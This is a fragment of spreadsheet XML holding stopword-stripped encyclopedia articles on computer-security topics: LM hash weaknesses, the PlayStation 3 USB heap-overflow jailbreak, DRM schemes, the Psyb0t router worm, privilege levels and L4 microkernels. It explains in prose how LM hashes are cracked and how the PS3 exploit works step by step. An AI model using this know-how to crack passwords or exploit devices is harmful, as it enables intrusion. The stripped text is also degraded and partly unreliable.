generating hash value. hence hash treats password, password, password, password similar combinations password. this practice effectively reduces hash space characters. 14-character password broken characters hash calculated half separately. this calculating hash makes dramatically easier crack, attacker needs brute-force characters twice instead full characters. this makes effective strength 14-character password equal {\displaystyle 2\times 69^{7}\approx 2^{44}} twice 7-character password, trillion times less complex {\displaystyle 69^{14}\approx 2^{86}} theoretical strength 14-character single-case password. 2020, computer equipped high-end graphics processor (gpus) compute billion lm-hashes second. rate, 7-character passwords 95-character tested broken half hour; 7-character alphanumeric passwords tested broken seconds. password characters less, second half hash always produce constant value (0xaad3b435b51404ee). therefore, password less equal characters long identified visibly without using tools (though high speed attacks, matters less). hash value sent network servers without salting, making susceptible man-in-the-middle attacks replay hash. without salt, time–memory tradeoff pre-computed dictionary attacks, rainbow table, feasible. 2003, ophcrack, implementation rainbow table technique, published. specifically targets weaknesses encryption, includes pre-computed data sufficient crack virtually alphanumeric hashes seconds. many cracking tools, rainbowcrack, hashcat, l0phtcrack cain, incorporate similar attacks make cracking hashes fast trivial. workarounds address security weaknesses inherent encryption authentication schemes, microsoft introduced ntlmv1 protocol 1993 windows 3.1. hashing, ntlm uses unicode support, replacing lmhash=deseach(doscharset(uppercase(password)), "kgs!@#$%") nthash=md4(utf-16-le(password)), require padding truncating would simplify key. negative side, algorithm used 56-bit encryption subsequent authentication steps, still salting. furthermore, windows machines many years configured default send accept responses derived hash ntlm hash, ntlm hash provided additional security weaker hash still present. also took time artificial restrictions password length management tools user manager lifted. while manager considered obsolete current windows operating systems stronger ntlmv2 kerberos authentication methods, windows systems windows vista/windows server 2008 enabled manager hash default backward compatibility legacy manager windows earlier clients, legacy netbios-enabled applications. many years considered good security practice disable compromised ntlmv1 authentication protocols needed. starting windows vista windows server 2008, microsoft disabled hash default; feature enabled local accounts security policy setting, active directory accounts applying setting domain group policy. method used turn feature windows 2000, windows users also prevent hash generated password using password least fifteen characters length. ntlm hashes turn become vulnerable recent years various attacks effectively make weak today lanman hashes back 1998. reasons continued hash many legacy third party implementations taken considerable time support stronger protocols microsoft created replace hashing open source communities supporting libraries first reverse engineer newer protocols—samba took years ntlmv2 support, jcifs took years. poor patching regimes subsequent software releases supporting feature becoming available contributed organisations continuing hashing environments, even though protocol easily disabled active directory itself. lastly, prior release windows vista, many unattended build processes still used boot disk (instead windows start installation windows using winnt.exe, something requires hashing enabled legacy manager networking stack work. also manager active directory password cracking dictionary attack remote program load (rpl) security account manager notes references external links https://web.archive.org/web/20170212195243/http://msdn.microsoft.com/en-us/library/cc237025.aspx</t>
  </si>
  <si>
    <t>PlayStation 3 Jailbreak</t>
  </si>
  <si>
    <t>playstation jailbreak first (universal serial bus) chipset allowed unauthorized execution code, similar homebrew, playstation works bypassing system security check using memory exploit (heap overflow) occurs devices allows execution unsigned code. popular pieces homebrew software used device backup manager, allows users copy game titles optical media hard drive playstation backup manager also used homebrew applications created console's native mode. multiple devices perform code execution exist, open sourced versions (e.g. groove, freedom). most work playstation system software v3.41 lower playstation's system software v3.42 patches chip exploit console. creators jailbreak also released downgrade enables downgrading playstation system software v3.41 lower) v3.42, v3.50, v3.55. present future support august, 2011, information hardware downgrading playstations system software v3.70 released. these hardware mods nand/nor chip flashers would either soldered clipped onto playstation's chips nand/nor chip located playstation's motherboard. would flash memory chip backup playstation's firmware, downgrading console hard-drive formatted. these flashers still work latest system software version purchased online.in september 2011, lulzsec cody kretsinger arrested attacking sony pictures website previously taken offline ddos attack lasting months, kretsinger found released level security codes could used unauthorized firmware known ("custom firmware"). these keys would allowed chinese hacking group known "blue disk" release purchasable (custom firmware) 4.21 above. shortly after, well-known playstation developer, "rogero," released free charge 4.21 cfw. there different developers releasing cfws latest versions playstation firmware. these custom firmware render playstation jailbreak obsolete. they cannot, however, installed unless playstation system software version 3.55 below.on june 2013, 3.60+ loader keys released public "the great unicorns" hard-drive encryption phat consoles released developer called "flatz." following lv1ldr crypto keys released 4.21-4.46.as december, 2020, websites psx-place still working exploiting vulnerabilities install super slim consoles. they able homebrew applications version playstation exploiting vulnerabilities official firmware console. inner workings jail break effectively exploits using heap overflow. when dongle plugged (all models-"fat" "slim") device descriptors notify 6-port hub. after memory allocated device 6-port hub, jail break tells device plugged port hub. this device contains payload exploit complete. this device normal device descriptors typical device. after memory allocated payload device port jail break tells another device plugged port this device hold data related exploit typical device descriptors. next, jail break says another device plugged port this device important causes heap exploit later process. port device contains unusually large device descriptors. after memory allocated port jail break tells device port removed. this frees memory used allocate device descriptors. after this, another device plugged port holds configuration descriptors third holding powerpc shellcode (which used exploit system forces system payload port port another device plugged emulates "ps3 service jig", device used recover corrupted non-functional ps3's sony factories. this device matches device descriptors configuration descriptors real "jig" when tries allocate memory check "jig" authentic, fails heap overflow occurs bytes allocated points next free memory address actually free overwritten earlier process. this means shellcode gets sent executed (this exploit passed unsigned code check) starts executed soon detects removal "devices" "usb hub". shellcode tells read execute payload first port effectively allows unsigned code system. legality sony taken steps prevent jailbreak playstation associated action form copyright infringement. eastern european countries, action ever taken condemn cases. cases listed lawsuits sony filed courts prohibit sales imports circumvention devices would jailbreak system. jailbreak outlawed australia considered violation copyright law. states jailbreak cannot imported, distributed another person offered public. sony lost lawsuit december 2010 barcelona seller jailbreak. sales imports product therefore deemed legal within spain, sony ordered damages trying block sales imports. january 2011, sony filed lawsuit george hotz leaking encryption keys playstation case settled april year, hotz agreed permanent injunction never circumvent sony product again. court also approved sony's lawyers could obtain addresses anyone visited hotz's website. also playstation homebrew game backup device modchip privilege escalation george hotz playstation system software references</t>
  </si>
  <si>
    <t>PowerNow!</t>
  </si>
  <si>
    <t>powernow! amd's dynamic frequency scaling power saving technology laptop processors. cpu's clock speed vcore automatically decreased computer load idle, save battery power, reduce heat noise. lifetime also extended reduced electromigration, varies exponentially temperature.the technology concept similar intel's speedstep technology. adaptation powernow! amd's desktop cpus called cool'n'quiet. newer opterons also adaptation powernow! called optimized power management. supplied supported drivers powernow! technology work windows 2000. processors supporting powernow! k6-2+ k6-iii+ athlon xp-m models. mobile athlon mobile sempron turion athlon accelerated processing unit also dynamic frequency scalingpower saving technologies: cool'n'quiet (desktop cpus) powertune (graphics) intel speedstep (cpus)performance boosting technologies: turbo core (cpus) intel turbo boost (cpus) references external links powernow!</t>
  </si>
  <si>
    <t>L4 microkernel family</t>
  </si>
  <si>
    <t>family second-generation microkernels, used implement variety types operating systems (os), though mostly unix-like, portable operating system interface (posix) compliant types. like predecessor microkernel created german computer scientist jochen liedtke response poor performance earlier microkernel-based oses. liedtke felt system designed start high performance, rather goals, could produce microkernel practical use. original implementation hand-coded intel i386-specific assembly language code 1993 sparked intense interest computer industry. since introduction, developed cross-platform improve security, isolation, robustness. there various re-implementations original binary kernel application binary interface (abi) successors, including l4ka::pistachio (karlsruhe institute technology), l4/mips (university south wales (unsw)), fiasco (dresden university technology dresden)). reason, name generalized longer refers liedtke's original implementation. applies whole microkernel family including kernel interface different versions. widely deployed. variant, okl4 open kernel labs, shipped billions mobile devices. design paradigm specifying general idea microkernel, liedtke states: concept tolerated inside microkernel moving outside kernel, i.e., permitting competing implementations, would prevent implementation system's required functionality. spirit, microkernel provides basic mechanisms: address spaces (abstracting page tables providing memory protection), threads scheduling (abstracting execution providing temporal protection), inter-process communication (for controlled communication across isolation boundaries). operating system based microkernel like provides services servers user space monolithic kernels like linux older generation microkernels include internally. example, implement secure unix-like system, servers must provide rights management mach included inside kernel. history poor performance first-generation microkernels, mach, number developers re-examine entire microkernel concept mid-1990s. asynchronous in-kernel-buffering process communication concept used mach turned main reasons poor performance. this induced developers mach-based operating systems move time-critical components, like file systems drivers, back inside kernel. while somewhat ameliorated performance issues, plainly violates minimality concept true microkernel (and squanders major advantages). detailed analysis mach bottleneck indicated that, among things, working large: code expresses poor spatial locality; results many cache misses, in-kernel. this analysis gave rise principle efficient microkernel small enough majority performance-critical code fits (first-level) cache (preferably small fraction said cache). jochen liedtke prove well designed thinner inter-process communication (ipc) layer, careful attention performance machine-specific contrast cross-platform software) design could yield large real-world performance improvements. instead mach's complex system, microkernel simply passed message added overhead. defining implementing required security policies considered duties user space servers. role kernel provide needed mechanism enable user-level servers enforce policies. developed 1988, proved safe robust operating system, used many years example technischer überwachungsverein (technical inspection association). after experience using liedtke came conclusion several mach concepts also misplaced. simplifying microkernel concepts even developed first kernel primarily designed high performance. extract every performance, whole kernel written assembly language, times faster mach's. such dramatic performance increases rare event operating systems, liedtke's work triggered implementations work l4-based systems number universities research institutes, including ibm, liedtke started work 1996, dresden unsw. ibm's thomas watson research center liedtke colleagues continued research microkernel based systems general, especially sawmill l4ka::hazelnut 1999, liedtke took systems architecture group university karlsruhe, continued research microkernel systems. proof concept high performance microkernel could also constructed higher level language, group developed l4ka::hazelnut, version kernel ia-32- arm-based machines. effort success, performance still acceptable, release, pure assembly language versions kernels effectively discontinued. l4/fiasco parallel development l4ka::hazelnut, 1998 operating systems group tud:os dresden started develop implementation kernel interface, named l4/fiasco. contrast l4ka::hazelnut, allows concurrency kernel, successor l4ka::pistachio, allows interrupts kernel specific preemption points, l4/fiasco fully preemptible (with exception extremely short atomic operations) achieve interrupt latency. this considered necessary l4/fiasco used basis drops, hard real-time computing capable operating system, also developed dresden. however, complexities fully preemptible design prompted later versions fiasco return traditional approach running kernel interrupts disabled, except limited number preemption points. cross-platform l4ka::pistachio release l4ka::pistachio newer versions fiasco, microkernels inherently tied close underlying architecture. next shift development development cross-platform (platform-independent) application programming interface (api) still retained high performance characteristics despite higher level portability. although underlying concepts kernel same, provided many significant changes relative prior versions, including better support multi-processor systems, looser ties threads address spaces, introduction user-level thread control blocks (utcbs) virtual registers. after releasing (version a.k.a. version early 2001, system architecture group university karlsruhe implemented kernel, l4ka::pistachio, completely scratch, focus high performance portability. released two-clause license. newer fiasco versions l4/fiasco microkernel also extensively improved years. supports several hardware platforms ranging amd64 several platforms. notably, version fiasco (fiasco-ux) user-level application linux. l4/fiasco implements several extensions l4v2 api. exception enables kernel send exceptions user-level handler applications. with help alien threads, possible perform fine-grained control system calls. x.2-style utcbs added. also, fiasco contains mechanisms controlling communication rights kernel-level resource use. fiasco, collection basic user level services developed (named l4env) among others used para-virtualise current linux version (4.19 2019) (named l4linux). university south wales nicta development also occurred university south wales (unsw), developers implemented several 64-bit platforms. their work resulted l4/mips l4/alpha, resulting liedtke's original version retrospectively named l4/x86. like liedtke's original kernels, unsw kernels (written assembly unportable implemented scratch. with release highly portable l4ka::pistachio, unsw group abandoned kernels favor producing highly tuned ports l4ka::pistachio, including fastest-ever reported implementation message passing cycles itanium architecture). group also demonstrated device drivers perform equally well user-level in-kernel, developed wombat, highly portable version linux runs x86, arm, mips processors. xscale processors, wombat context-switching costs times lower native linux.later unsw group, home nicta (formerly national australia, ltd.), forked l4ka::pistachio version named nicta::l4-embedded. name implies, commercial embedded systems, consequently implementation trade-offs favored small memory size reduced complexity. modified keep almost system calls short enough need preemption points ensure high real-time responsiveness. commercial deployment november 2005, nicta announced qualcomm deploying nicta's version mobile station modem chipsets. this mobile phone handsets sale late 2006. august 2006, ertos leader unsw professor gernot heiser spun company named open kernel labs labs) support commercial users develop commercial brand name okl4, close collaboration nicta. okl4 version 2.1, released april 2008, first generally available version featured capability-based security. okl4 3.0, released october 2008, last open-source version okl4. more recent versions closed source based rewrite support native hypervisor variant named okl4 microvisor. labs also distributed paravirtualized linux named ok:linux, descendant wombat, paravirtualized versions symbianos android. labs also acquired rights sel4 nicta. okl4 shipments exceeded billion early 2012, mostly qualcomm wireless modem chips. other deployments include automotive infotainment systems.apple series processors beginning contain secure enclave coprocessor running operating system based l4-embedded kernel developed nicta 2006. this implies shipping devices, total shipment estimated million year 2015. high assurance: sel4 2006, nicta group commenced from-scratch design third-generation microkernel, named sel4, providing basis highly secure reliable systems, suitable satisfying security requirements common criteria beyond. from beginning, development aimed formal verification kernel. ease meeting sometimes conflicting requirements performance verification, team used middle-out software process starting executable specification written haskell. sel4 uses capability-based security access control enable formal reasoning object accessibility. formal proof functional correctness completed 2009. proof provides guarantee kernel's implementation correct specification, implies free implementation bugs deadlocks, livelocks, buffer overflows, arithmetic exceptions uninitialised variables. sel4 claimed first-ever general-purpose operating-system kernel verified.sel4 takes novel approach kernel resource management, exporting management kernel resources user level subjects capability-based access control user resources. this model, also adopted barrelfish, simplifies reasoning isolation properties, enabler later proofs sel4 enforces core security properties integrity confidentiality. nicta team also proved correctness translation programming language executable machine code, taking compiler trusted computing base sel4. this implies high-level security proofs hold kernel executable. sel4 also first published protected-mode kernel complete sound worst-case execution time (wcet) analysis, prerequisite hard real-time computing.on july 2014, nicta general dynamics systems announced sel4, proofs, released open-source licenses. kernel source code proofs licensed general public license version (gplv2), libraries tools 2-clause. april 2020, announced sel4 foundation created umbrella linux foundation accelerate development deployment sel4.the researchers state cost formal software verification lower cost engineering traditional "high-assurance" software despite providing much reliable results. specifically, cost line code development sel4 estimated around us$400, compared us$1,000 traditional high-assurance systems.under defense advanced research projects agency (darpa) high-assurance cyber military systems (hacms) program, nicta together project partners rockwell collins, galois inc, university minnesota boeing developed high-assurance drone using sel4, along assurance tools software, planned technology transfer onto optionally piloted autonomous boeing ah-6 unmanned little bird helicopter developed boeing. final demonstration hacms technology took place sterling, april 2017. darpa also funded several small business innovative research (sbir) contracts related sel4 program started john launchbury. small businesses receiving sel4-related sbir included: dornerworks, techshot, wearable inc, real time innovations, critical technologies. other research development osker, written haskell, targeted specification; although project focused mainly functional programming language development, microkernel research.codezero microkernel embedded systems focus virtualization implementation native services. there gpl-licensed version, version relicensed labs ltd., acquired nvidia, closed source forked 2010.f9 microkernel, bsd-licensed implementation, dedicated cortex-m processors deeply embedded devices memory protection. nova virtualization architecture research project focus constructing secure efficient virtualization environment small trusted computing base. nova consists microhypervisor, user level hypervisor (virtual machine monitor), unprivileged componentised multi-server user environment running named nul. nova runs armv8-a x86-based multi-core systems. wrmos real-time operating system based microkernel. implementations kernel, standard libraries, network stack, supporting arm, sparc, x86, x86-64 architectures. there paravirtualized linux kernel (w4linux) working wrmos. also pikeos references further reading liedtke, jochen; bartling, ulrich; beyer, uwe; heinrichs, dietmar; ruland, rudolf; szalay, gyula (april 1991). "two years experience μ-kernel based os". sigops operating systems review. (2): 51–62. doi:10.1145/122120.122124. liedtke, jochen; haeberlen, andreas; park, yoonho; reuther, lars; uhlig, volkmar october 2000). "stub-code performance becoming important". proceedings workshop industrial experiences systems software (wiess), diego, october 2000. archived original (pdf) september 2006. retrieved september 2006. kernel compiler) cheng, guanghui; mcguire, nicholas. l4/fiasco/l4linux kickstart (pdf). distributed embedded systems (report). lanzhou university. archived original (pdf) march 2012. elphinstone, kevin; heiser, gernot (november 2013). "from sel4: what have learnt years microkernels?" (pdf). 24th sigops symposium operating systems principles. farmington, usa. 133–150. citeseerx 10.1.1.636.9410. doi:10.1145/2517349.2522720. isbn 978-1-4503-2388-8. evolution design implementation approaches external links l4hq: headquarters, community site projects archived 2019-10-25 wayback machine official website, sel4 microkernel family, overview implementations, documentation, projects official tud:os wiki l4ka: implementations l4ka::pistachio l4ka::hazelnut unsw: implementations alpha mips architecture okl4 archived 2008-08-20 wayback machine: commercial version open kernel labs archived 2009-03-19 wayback machine nicta research overview publications archived] 2014-07-17 wayback machine trustworthy systems group csiro's data61: present home former nicta group developed sel4 genode operating system framework: offspring community</t>
  </si>
  <si>
    <t>Self-Protecting Digital Content</t>
  </si>
  <si>
    <t>self protecting digital content (spdc), copy protection (digital rights management) architecture allows restriction access copying next generation optical discs streaming/downloadable content. overview designed cryptography research, inc. francisco, spdc executes code encrypted content player, enabling content providers change systems case existing system compromised. adds functionality make system "dynamic", opposed "static" systems system keys encryption decryption change, thus enabling compromised decode content released using encryption system. "dynamic" systems attempt make future content released immune existing methods circumvention. playback method method playback used previously released content revealed weakness, either review already exploited, code embedded content released future change method, attackers start attack again. targeting compromised players certain model players compromised, code specific model activated verify particular player compromised. player "fingerprinted" found compromised information used later. forensic marking code inserted content information output specifically identifies player, large-scale distribution content, used trace player. this include fingerprint specific player. weaknesses entire class players compromised, infeasible revoke ability content entire class many customers purchased players class. fingerprint used work around limitation, attacker access multiple sources video "scrub" fingerprint, removing fingerprint entirely rendering useless least. because dynamic execution requires virtual environment, possible recreate execution environment general purpose computer feeds executing code whatever attacker wants code terms digital fingerprints memory footprints. this allows players running general purpose computers emulate specific model player, potentially simply downloading firmware updates players emulated. once emulated execution environment decrypted content, stored decrypted form. because content encryption scheme (such bd+) separate transport encryption scheme (such hdcp), digital content transferred inside player circuits unencrypted form. possible extract digital data directly circuit traces inside licensed legal player content re-encrypted transport across wire, allowing modified player used decryption device protected content. only device must exist content widely distributed digital networks internet. final weakness schemes noninteractive works ultimate decryption display end-users. content time re-encoded digital file. presumption re-encoding lossy, fully digital copies made modified viewing devices. example, hdcp unencrypted adapters exist market used infringers re-encode digital copies without modifying players. there also exists adapters split hdcp-encumbered hdmi stream non-encrypted s/pdif streams, digital, allowing next-to-lossless reconstruction digital copies complete video audio streams. further, infringers make copies analog hole. modern televisions merely megapixels resolution specification static least decades, high-expense consumer product cycles necessarily long higher resolution provides decreasing benefit consumer. time specification mid-life, cameras megapixel resolution available able record full-motion video, allowing full two-axis oversampling software reconstruction original stream pixel-by-pixel, analog losses encoded slight variations pixel color--and even loss compensated color profile adjustment re-encode completed. would possible compensate possible compression color space dynamic, however, leading slight posterizing effect. this effect already apparent compressed video seem bother consumers. external links about self-protecting digital content self-protecting digital content technical report content security research initiative</t>
  </si>
  <si>
    <t>Psyb0t</t>
  </si>
  <si>
    <t>psyb0t network bluepill computer worm discovered january 2009. thought unique infect routers high-speed modems. progress psyb0t first detected january 2009 australian security researcher terry baume netcomm adsl router/modem. then, early march, ddos attack dronebl blacklisting service). from attack, dronebl estimated infected 100,000 devices. this attack brought public attention later march probably caused operator shut down. also dronebl successfully attempted bring command-and-control servers down. description psyb0t targets modems routers little-endian mips processor running mipsel linux firmware. part botnet operated command-and-control servers. after infecting, psyb0t blocks access router ports psyb0t contains many attack tools. known able perform network scan vulnerable routers/modems, check mysql phpmyadmin vulnerabilities perform website attack. there versions known. first version 2.5l affecting netcomm adsl router/modem. newer version 2.9l affects models linksys, netgear vendors, including running dd-wrt openwrt firmware. attack vectors countermeasures primary attack vector telnet access. using brute-forcing, tries gain access 6000 usernames 13000 passwords. however, infections caused insecure configuration, mostly default administration password allowed remote administration. recommended countermeasures change default access credentials secure ones update router/modem firmware. case infection suspicion, advised perform hard reset router. references external links psyb0t description dronebl blog psyb0t worm infect home modem/routers</t>
  </si>
  <si>
    <t>Privilege (computing)</t>
  </si>
  <si>
    <t>computing, privilege defined delegation authority perform security-relevant functions computer system. privilege allows user perform action security consequences. examples various privileges include ability create user, install software, change kernel functions. users delegated extra levels control called privileged. users lack privileges defined unprivileged, regular, normal users. theory privileges either automatic, granted, applied for. automatic privilege exists requirement permission perform action. example, systems people required system logging require privilege. systems implement file protection ms-dos essentially give unlimited privilege perform action file. granted privilege exists result presenting credential privilege granting authority. this usually accomplished logging system username password, username password supplied correct, user granted additional privileges. privilege applied either executed program issuing request advanced privileges, running program apply additional privileges. example user applying additional privileges provided sudo command command superuser (root) user, kerberos authentication system. modern processor architectures multiple modes allows different privilege levels. some processors levels (such user supervisor); i386+ processors four levels most, least privileges). tasks tagged privilege level. resources (segments, pages, ports, etc.) privileged instructions tagged demanded privilege level. when task tries resource, execute privileged instruction, processor determines whether permission not, "protection fault" interrupt generated). this prevents user tasks damaging other. computer programming, exceptions related privileged instruction violations caused array accessed bounds invalid pointer dereferenced invalid memory location referenced privileged location, controlling device input/output. this particularly likely occur programming languages pointer arithmetic check array bounds automatically. unix unix-like systems, superuser (commonly known 'root') owns privileges. ordinary users granted enough permissions accomplish common tasks. unix systems built-in security features. most users cannot user account administrative procedures. user “root” special user, something called super-user, anything system. this high degree power necessary fully administer unix system, also allows user make mistake cause system problems. unprivileged users usually cannot: adjust kernel options; modify system files, files users. change ownership files; change runlevel systems system v-style initialization); change file mode files; adjust ulimits disk quotas; start, stop remove daemons; signal processes users; create device nodes; create remove users groups; mount unmount volumes (although becoming common allow regular users mount unmount removable media, compact discs typically accomplished fuse); execute contents sbin/ directory (although becoming common simply restrict behavior programs executed regular users); bind ports 1024. windows windows nt-based systems, privileges delegated varying degrees. these delegations defined using local security policy manager (secpol.msc). following abbreviated list default assignments: authority\system' closest equivalent superuser unix-like systems. many privileges classic unix superuser (such trustee every file created); 'administrator' closest equivalents superuser (root) unix-like systems. however, user cannot override many operating system's protections superuser can; members 'administrators' group privileges almost equal 'administrator'; members 'power users' group ability install programs backup system. members 'users' group equivalent unprivileged users unix-like systems.windows defines number administrative privileges assigned individually users and/or groups. account (user) holds privileges granted either directly indirectly group memberships. upon installation number groups accounts created privileges granted them. however, grants changed later time though group policy. unlike linux, privileges implicitly permanently granted specific account. some administrative privileges (e.g. taking ownership restoring arbitrary files) powerful used malicious intent could allow entire system compromised. with user account control default since windows vista) windows strip user token privileges login. thus, user logs account broad system privileges, he/she still running system privileges. whenever user wants perform administrative actions requiring system privileges he/she elevated process. when launching elevated process, user made aware his/her administrative privileges asserted prompt requiring his/her consent. holding privileges actually required keeping principle least privilege. elevated processes full privileges user, full privileges system. even privileges user still required particular process, thus completely least privilege. dos-based windows windows windows previous versions non-nt windows operated filesystem, support filesystem permissions therefore privileges effectively defeated windows nt-based systems ntfs file system. nomenclature names used windows source code either "privilege" "logonright". this confusion full "rights" "privileges" called. microsoft currently uses term "user rights". past terms also used microsoft, "privilege rights" "logon user rights" "nt-rights". also file-system permissions kernel (operating system) principle least privilege superuser privilege escalation references</t>
  </si>
  <si>
    <t>PlayReady</t>
  </si>
  <si>
    <t>playready media file copy prevention technology microsoft includes encryption, output prevention digital rights management (drm). announced february 2007. technological differences main differences relative previous schemes microsoft are: some popular features already present schemes market added; include concept domain (group devices belonging user share licenses), embedded licenses (licenses embedded content files, avoiding separate step license acquisition) envelopes (the ability arbitrary, potentially non-media content). also protection scheme smooth streaming, microsoft's adaptive streaming technology. platform-independent: unlike microsoft schemes like janus, playready ported kind portable device, even uses non-microsoft technology (os, codecs, media player, etc.). competitors playready competes proprietary schemes even drm-free software, notably apple's fairplay introduced itunes quicktime. there several schemes competing become dominant technology (e.g. widevine). versions microsoft released first version playready suite (porting devices, runtime, server sdk) june 2008. silverlight 2.0, released october 2008, supports content restricted playready. silverlight 4.0, implementation microsoft playready silverlight supports offline content (via persisted license), subscription scenarios (via chained licenses) online, streaming-only content (via simple non-persistent licenses). output protection support also added silverlight 4.0. interoperability playready backwards compatible windows media content, meaning content encrypted (for instance, content playsforsure devices) play playready terminal. copyenablers moveenablers longer supported playready above. playsforsure compliant devices play playready-encrypted content. references external links official playready website microsoft ready play playready register, february 2008 msdn explanations code snippets playready silverlight</t>
  </si>
  <si>
    <t>PrivateCore</t>
  </si>
  <si>
    <t>privatecore venture-backed startup located palo alto, california develops software secure server data server attestation memory encryption. company's attestation memory encryption technology fills exists “data motion” encryption (tls, email encryption) “data rest” encryption (disk encryption, tape encryption) protecting “data use” (random access memory). privatecore memory encryption technology protects threats servers cold boot attacks, hardware advanced persistent threats, rootkits/bootkits, computer hardware supply chain attacks, physical threats servers insiders. privatecore acquired facebook (now meta platforms) august 2014. history privatecore founded 2011 security veterans vmware google seed funding foundation capital. privatecore “virtualizes” physical security enables service providers enterprises deploy servers processing sensitive data outsourced environments maintaining security around data use.the company's memory encryption technology spurred number industry trends including increasing sophistication hackers, larger number servers outsourced environments, larger amounts sensitive data placed persistent memory, virtualization technology increase environment attack surface. privatecore acquired facebook, deal announced august 2014. technology privatecore's focus securing data-in-use servers. company taken advantage recent microprocessor innovations including larger microprocessor caches hardware cryptographic acceleration technology enable effective methods encrypting memory maintaining acceptable application performance. technology approach goes beyond previous academic research efforts tresor. privatecore assumes element need trusted system central processing unit (cpu). firm uses trusted platform module (tpm) chips intel trusted execution technology (intel txt) provide remote server attestation. privatecore also supports cryptographic hardware acceleration provided intel aes-ni technology. privatecore technology positioned applicable outsourced hosted environments enterprise cannot trust compute infrastructure. products privatecore vcage product portfolio comprises vcage manager vcage host. vcage manager validates integrity servers running linux well vcage host. vcage host installs bare-metal servers provides hardened hypervisor based secure server random access memory (ram) encryption. vcage host loading secure hypervisor cache acting gateway encrypt memory paging cache ram. vcage memory encryption leverages hypervisor also potential support hypervisors. vcage host supports existing management tools. vcage supports number cases including creating openstack trusted computing pools well protecting servers co-location bare-metal cloud environments. vcage manager vcage host became generally available february 2014. references external links official website physical privilege escalation mitigation world, talk given founders cansecwest 2013</t>
  </si>
  <si>
    <t>Power failure transfer</t>
  </si>
  <si>
    <t>telecommunication, term power failure transfer following meanings: switching primary utilities secondary backup whenever primary source operates outside design parameters. this accomplished transfer switch. telephony, function which, activated event commercial power failure low-voltage battery condition subscriber location, supplies power predesignated subscriber equipment central office trunk.power-failure transfer emergency mode operation instrument powered trunk line subscriber location central office. references this article incorporates public domain material general services administration document: "federal standard 1037c".</t>
  </si>
  <si>
    <t>Private set intersection</t>
  </si>
  <si>
    <t>private intersection secure multiparty computation cryptographic technique allows parties holding sets compare encrypted versions sets order compute intersection. scenario, neither party reveals anything counterparty except elements intersection. other variants exist, server-client scenario, client learns intersection server, without server learning intersection clients. comparison data sets cryptographic hashes small predictable domain, precautions taken prevent dictionary attacks. apple uses technique password monitoring. proposed using technology announced expanded protections children general, protocols categorized broad categories: traditional delegated psi. traditional category, data owners interact directly need copy time computation, e.g., delegated computation and/or storage sets delegated third-party server (that might passive active adversary). delegated category divided classes: support one-off delegation, support repeated delegation. protocols support one-off delegation require data owner re-encode data send encoded data server computation, e.g., those support repeated delegation allow data owners upload (encrypted) data server once, re-use many times computation carried server, e.g., recently, researchers proposed variant protocol traditional delegated categories) support data update, e.g., this type protocol lets data owners insert/delete elements into/from data overheads privacy-preserving manner. references</t>
  </si>
  <si>
    <t>PikeOS</t>
  </si>
  <si>
    <t>pikeos commercial, hard real-time operating system (rtos) offers separation kernel based hypervisor multiple logical partition types many operating systems (os), called guestos, applications. enables users build certifiable smart devices internet things (iot) according high quality, safety security standards different industries. safety security critical real-time applications controller-based systems without memory management unit (mmu) memory protection unit (mpu) pikeos available. overview pikeos combines real-time operating system (rtos) virtualization platform eclipse-based integrated development environment (ide) embedded systems. commercial clone microkernel family. pikeos developed safety security-critical applications certification needs fields aerospace, defense, automotive, transport, industrial automation, medical, network infrastructures, consumer electronics. feature pikeos ability safely execute applications different safety security levels concurrently computing platform. this done strict spatial temporal segregation applications software partitions. software partition seen container pre-allocated privileges access memory, central processing unit (cpu) time, input/output (i/o), predefined list services. with pikeos, term application refers executable linked pikeos application programming interface (api) library running process inside partition. nature pikeos application programming interface (api) allows applications range simple control loops full paravirtualized guest operating systems like linux hardware virtualized guests. software partitions also called virtual machines (vms), possible implement complete guest operating system inside partition executes independently partitions thus address cases mixed criticality. pikeos seen type hypervisor. supported toolchain, codeo eclipse-based codeo supports system architects graphical configuration tools, providing components software engineers need develop embedded applications, well including comprehensive wizards help embedded project development time-saving cost-efficient way: guided configuration remote debugging (down hardware instruction level) target monitoring remote application software deployment timing analysisseveral dedicated graphical editing views supporting system integrator always keep overview important aspects pikeos system configuration showing partition types, scheduling, communication channels, shared memory device configuration within partitions. projects easily defined help reusable templates distributed development groups. users configure predefined components project also define components development process. benefits real-time operating system including type hypervisor defined highly flexible configuration supports fast secure booting times supporting mixed criticality separation kernel system configuration partitions time hardware resources kernel driver user space drivers supported hardware independence processor types families easy migration processes high portability single- multi-core developed support certification according multiple safety security standards reduced time market standard development verification tools wide range supported guestos types: apis export restriction: european solution certification standards safety certification standards according radio technical commission aeronautics (rtca) do-178b/c international organization standardization (iso) 26262 international electrotechnical commission (iec) 62304, 61508 50128, 50657security certification standards according common criteria partner ecosystem sysgo committed establish technology business partnerships help software engineers achieve goals. october 2017, sysgo working partners globally.an excerpt partners category mentioned below: board vendors: curtiss-wright controls embedded computing, kontron, abaco silicon vendors: nxp, renesas, texas instruments (ti), xilinx, infineon, nvidia intel software partners: coreavi, wolfssl, aicas, adacore, esterel, rti, prismtech, datalight, systerel, imagination technologies rapita tool partners: lauterbach, vector software, rapita, isystem supported architectures: arm, powerpc, x86, sparc request) supported guestos types linux android (ideally sysgo linux distribution elinos) posix pse51 pse52 extensions arinc rtems java autosar ada, including ravenscar profile others end-of-life overview references external links official website, sysgo pikeos official product site pikeos product note (pdf) pikeos flyer (pdf)</t>
  </si>
  <si>
    <t>L4Linux</t>
  </si>
  <si>
    <t>l4linux variant linux kernel operating systems, altered extent paravirtualized microkernel, l4linux kernel runs service. l4linux fork variant binary compatible linux kernel, thus replace linux kernel linux distribution. l4linux developed dresden real-time operating system project (drops) allow real-time time-sharing programs computer parallel time. l4linux also allows setting virtualized environment vaguely similar kernel-based virtual machine (kvm), significant differences exist intent l4linux. l4android l4android fork l4linux encompasses modifications main-line linux kernel android. joint project operating systems group dresden university technology chair security telecommunications berlin institute technology. also wombat (operating system) mklinux, similar port linux kernel, mach microkernel references</t>
  </si>
  <si>
    <t>KOV-21</t>
  </si>
  <si>
    <t>kov-21 cryptographic card module developed auspices u.s. national security agency manufactured sypris electronics llc. intended cryptographic engine next generation management devices, an/pyq-10 loader, part u.s. government's cryptographic modernization initiative. sypris awarded contract production kov-21 units november, 2007. references</t>
  </si>
  <si>
    <t>Prey (software)</t>
  </si>
  <si>
